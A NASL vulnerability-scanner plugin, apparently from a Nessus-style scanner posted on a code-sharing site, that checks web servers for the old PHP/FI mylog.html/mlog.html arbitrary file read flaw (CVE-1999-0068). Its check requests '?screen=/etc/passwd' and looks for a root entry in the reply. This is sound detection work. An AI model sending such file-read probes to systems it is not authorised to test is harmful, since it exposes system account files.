php_arbitrary_file_access.nasl
来自「漏洞扫描源码,可以扫描linux,windows,交换机路由器」· NASL 代码 · 共 67 行
NASL
67 行
# This script was written by David Maciejak <david dot maciejak at kyxar dot fr>## Ref: Bryan Berg on Sun Oct 19 1997.## This script is released under the GNU GPLv2if(description){ script_id(15708); script_bugtraq_id(713); script_cve_id("CVE-1999-0068"); if ( defined_func("script_xref") ) script_xref(name:"OSVDB", value:"3396"); if ( defined_func("script_xref") ) script_xref(name:"OSVDB", value:"3397"); name["english"] = "PHP mylog.html/mlog.html read arbitrary file"; script_name(english:name["english"]); script_version ("$Revision: 38 $"); desc["english"] = "The remote host is running PHP/FI.The remote version of this software contains a flaw in the files mylog.html/mlog.html than can allow a remote attacker to view arbitrary files on the remote host.Solution : Upgrade to version 3.0 or newerRisk factor : High"; script_description(english:desc["english"]); summary["english"] = "Checks PHP mylog.html/mlog.html arbitrary file access"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2004 David Maciejak"); script_family(english:"CGI abuses", francais:"Abus de CGI"); script_dependencies("http_version.nasl"); script_require_ports("Services/www", 80); script_exclude_keys("Settings/disable_cgi_scanning"); exit(0);}include("http_func.inc");include("http_keepalive.inc");port = get_http_port(default:80);if ( ! port ) exit(0);foreach dir ( make_list(cgi_dirs(), "/php") ){ foreach htmlfile (make_list("/mylog.html", "/mlog.html")) { req = http_get(port:port, item:dir + htmlfile + "?screen=/etc/passwd"); res = http_keepalive_send_recv(port:port, data:req); if ( res == NULL ) exit(0); if ( egrep( pattern:"root:.*:0:[01]:.*", string:res) ) { security_hole(port); exit(0); } }}
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?